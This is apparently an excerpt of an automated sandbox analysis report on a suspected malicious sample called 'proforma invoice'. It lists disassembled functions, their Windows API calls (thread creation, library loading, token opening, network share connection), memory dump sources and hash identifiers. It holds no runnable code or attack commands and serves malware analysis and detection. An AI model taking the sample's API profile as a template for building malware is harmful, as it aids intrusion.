                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8cfab4b669815ca071df9ab3f53025906ec2918e561fe1a22e3ae9c9b14d25dc
                  • Instruction ID: 24732365b8b49cfa5ec34d4a23cfa5bab1c46384f676abc061a2e74cab6b9a05
                  • Opcode Fuzzy Hash: 8cfab4b669815ca071df9ab3f53025906ec2918e561fe1a22e3ae9c9b14d25dc
                  • Instruction Fuzzy Hash: 590162B2209A167EF62126B87CC1F67766EDF917B8B340327F567613D2DB608C409270
                  Function 00B01A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B01A47
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A59
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A6F
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
                  • Instruction ID: dbe494d6e84d7763a378e6a46b7c88bf4a24b0cf4b8b5f25d9645ddea6e08d24
                  • Opcode Fuzzy Hash: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
                  • Instruction Fuzzy Hash: AE11FA3AA01219FFEB119BA9CD85FADBBB8EB04750F200491E614B7290DA716E50DB94
                  Function 00B0E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 00B0E1FD
                  • MessageBoxW.USER32(?,?,?,?), ref: 00B0E230
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B0E246
                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B0E24D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                  • String ID:
                  • API String ID: 2880819207-0
                  • Opcode ID: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
                  • Instruction ID: ef8002e9e89b4e4bffa6083bf083ed99e55d42b5020861f7123385c490180780
                  • Opcode Fuzzy Hash: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
                  • Instruction Fuzzy Hash: 7211A176904254BBC7019FECAC09A9E7FACEB45324F154A69F928E3291DAB0D94487A0
                  Function 00ACD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,?,00ACCFF9,00000000,00000004,00000000), ref: 00ACD218
                  • GetLastError.KERNEL32 ref: 00ACD224
                  • __dosmaperr.LIBCMT ref: 00ACD22B
                  • ResumeThread.KERNEL32(00000000), ref: 00ACD249
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                  • String ID:
                  • API String ID: 173952441-0
                  • Opcode ID: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
                  • Instruction ID: a90bb23a25e9d30f8c8d512700d8a8a72ad39b91ca4ee613d9247db59698bd83
                  • Opcode Fuzzy Hash: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
                  • Instruction Fuzzy Hash: 05018076805204BBDB215BA9DC09FEE7E69EF81731F22422DF925A61D0DF71C901D7A0
                  Function 00B39EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • GetClientRect.USER32(?,?), ref: 00B39F31
                  • GetCursorPos.USER32(?), ref: 00B39F3B
                  • ScreenToClient.USER32(?,?), ref: 00B39F46
                  • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00B39F7A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Client$CursorLongProcRectScreenWindow
                  • String ID:
                  • API String ID: 4127811313-0
                  • Opcode ID: 0ebf0543a3d4845c42b7f3c4664c6f34a40824819de710280b194a0133c3e277
                  • Instruction ID: c8157a6156ffb423f3b127662d9c11f2693461ca54d08e3a6f168b714dd573d6
                  • Opcode Fuzzy Hash: 0ebf0543a3d4845c42b7f3c4664c6f34a40824819de710280b194a0133c3e277
                  • Instruction Fuzzy Hash: 1D112A3690011ABBDB10EFA8D886DEE7BB9FB45311F204495F911E3151DB70BA81CBA1
                  Function 00AA600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                  Download Yara Rule
                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                  • GetStockObject.GDI32(00000011), ref: 00AA6060
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateMessageObjectSendStockWindow
                  • String ID:
                  • API String ID: 3970641297-0
                  • Opcode ID: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
                  • Instruction ID: d749ad79949d33370d2aca1c5d72065f68ea9581c3cf43ccd612dfff49536ac9
                  • Opcode Fuzzy Hash: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
                  • Instruction Fuzzy Hash: 7B116D72501949BFEF124FA49C44EEABF6DEF093A5F194215FA1463150DB329CA0EFA0
                  Function 00AC3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00AC3B56
                    • Part of subcall function 00AC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00AC3AD2
                    • Part of subcall function 00AC3AA3: ___AdjustPointer.LIBCMT ref: 00AC3AED
                  • _UnwindNestedFrames.LIBCMT ref: 00AC3B6B
                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00AC3B7C
                  • CallCatchBlock.LIBVCRUNTIME ref: 00AC3BA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                  • String ID:
                  • API String ID: 737400349-0
                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction ID: 66a04a1d869950e0cdf5bb13ea439dbdb65293ffe8de1569a6c4a32ddb76f804
                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction Fuzzy Hash: 5901D733100149BBDF126F95CD46EEB7B6DEF58754F068018FE4866121C632E9619BA0
                  Function 00AD3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AA13C6,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue), ref: 00AD30A5
                  • GetLastError.KERNEL32(?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000,00000364,?,00AD2E46), ref: 00AD30B1
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000), ref: 00AD30BF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
                  • Instruction ID: ebb143d9faea073a6fffa4f4d991eecbaf62ab193b52a03026e235580765cdf1
                  • Opcode Fuzzy Hash: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
                  • Instruction Fuzzy Hash: 0601F737701222ABCF314BB8AC44A5B7BA8AF05B61B240621F907F7340CB21D901C7E1
                  Function 00B07464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B0747F
                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B07497
                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B074AC
                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B074CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Type$Register$FileLoadModuleNameUser
                  • String ID:
                  • API String ID: 1352324309-0
                  • Opcode ID: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
                  • Instruction ID: fee56db19181c9d57f01b22fed666847d10173763b33b94b4b06ce0471f8a3e2
                  • Opcode Fuzzy Hash: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
                  • Instruction Fuzzy Hash: 3F11A5B56453149BE7208F54EC48F9ABFFCEB00700F108599A556D7291DB70F904DB90
                  Function 00B0B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                  Download Yara Rule
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0C4
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0E9
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0F3
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B126
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CounterPerformanceQuerySleep
                  • String ID:
                  • API String ID: 2875609808-0
                  • Opcode ID: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
                  • Instruction ID: f333a79e0e4da3b9ce0fe2d4a771abef6f28afd7a7f2452dc5669616c44ad783
                  • Opcode Fuzzy Hash: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
                  • Instruction Fuzzy Hash: 8C113931C01928E7CF00AFE4E998AEEBFB8FF09711F204085D941B3181CF305A609B91
                  Function 00B02DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00B02DDD
                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                  • String ID:
                  • API String ID: 2710830443-0
                  • Opcode ID: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
                  • Instruction ID: e7d80db41cc31785d2511c15d5d85596ed4b68347d4f8a27583ecc8a06840fa5
                  • Opcode Fuzzy Hash: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
                  • Instruction Fuzzy Hash: 7DE06D711016247ADB201BA29C0EEEB3EACEB42BA1F200165B506E30809AA0C844C7B0
                  Function 00B38863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
                    • Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2
                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B38887
                  • LineTo.GDI32(?,?,?), ref: 00B38894
                  • EndPath.GDI32(?), ref: 00B388A4
                  • StrokePath.GDI32(?), ref: 00B388B2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                  • String ID:
                  • API String ID: 1539411459-0
                  • Opcode ID: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
                  • Instruction ID: 618a08b7f96d188843ed0cb4fed212e643049274d1f11a2dca1993f8878fbaf4
                  • Opcode Fuzzy Hash: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
                  • Instruction Fuzzy Hash: D5F03A36045698BADB125F98AC09FCE3F69AF06310F248040FB12760E2CB755552DBA5
                  Function 00AB98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                  Download Yara Rule
                  APIs
                  • GetSysColor.USER32(00000008), ref: 00AB98CC
                  • SetTextColor.GDI32(?,?), ref: 00AB98D6
                  • SetBkMode.GDI32(?,00000001), ref: 00AB98E9
                  • GetStockObject.GDI32(00000005), ref: 00AB98F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$ModeObjectStockText
                  • String ID:
                  • API String ID: 4037423528-0
                  • Opcode ID: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
                  • Instruction ID: a4d73356115d98faf36c557c4b6677229e9122babcbfdc2583161b6f0c5af825
                  • Opcode Fuzzy Hash: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
                  • Instruction Fuzzy Hash: 35E06531244644AADB215BB4AC09BED3F10AB11336F148219F7F5650E1C77146409B10
                  Function 00B0162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentThread.KERNEL32 ref: 00B01634
                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0163B
                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B011D9), ref: 00B01648
                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0164F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentOpenProcessThreadToken
                  • String ID:
                  • API String ID: 3974789173-0
                  • Opcode ID: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
                  • Instruction ID: 8f1b5bc116ccca74bf5f4f1c458487157694c60a8c38d60de56fbde9a0251a10
                  • Opcode Fuzzy Hash: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
                  • Instruction Fuzzy Hash: 54E08C32602211EBD7201FE4AE0DB8B3FBCEF44792F248848F245EA080EB348444CB68
                  Function 00AFD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetDesktopWindow.USER32 ref: 00AFD858
                  • GetDC.USER32(00000000), ref: 00AFD862
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
                  • ReleaseDC.USER32(?), ref: 00AFD8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
                  • Instruction ID: 35e102deb06b1ea719f7306840f429b6aa64830a2f7a42ce7b1b2123659b4a7b
                  • Opcode Fuzzy Hash: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
                  • Instruction Fuzzy Hash: E8E0EEB1800204EFCB41AFE09909A6DBFB6AB08310F208009F846E7260CB388901AF40
                  Function 00AFD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                  Download Yara Rule
                  APIs
                  • GetDesktopWindow.USER32 ref: 00AFD86C
                  • GetDC.USER32(00000000), ref: 00AFD876
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
                  • ReleaseDC.USER32(?), ref: 00AFD8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
                  • Instruction ID: 31586898d86c9dbae025b7c04a42a57f6921b23b12c39d643440399137ff39ec
                  • Opcode Fuzzy Hash: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
                  • Instruction Fuzzy Hash: 7EE092B5800604EFCB51AFE0D94D66DBFB5BB08311F248449F94AF7260DB389905EF50
                  Function 00B14D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B14ED4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
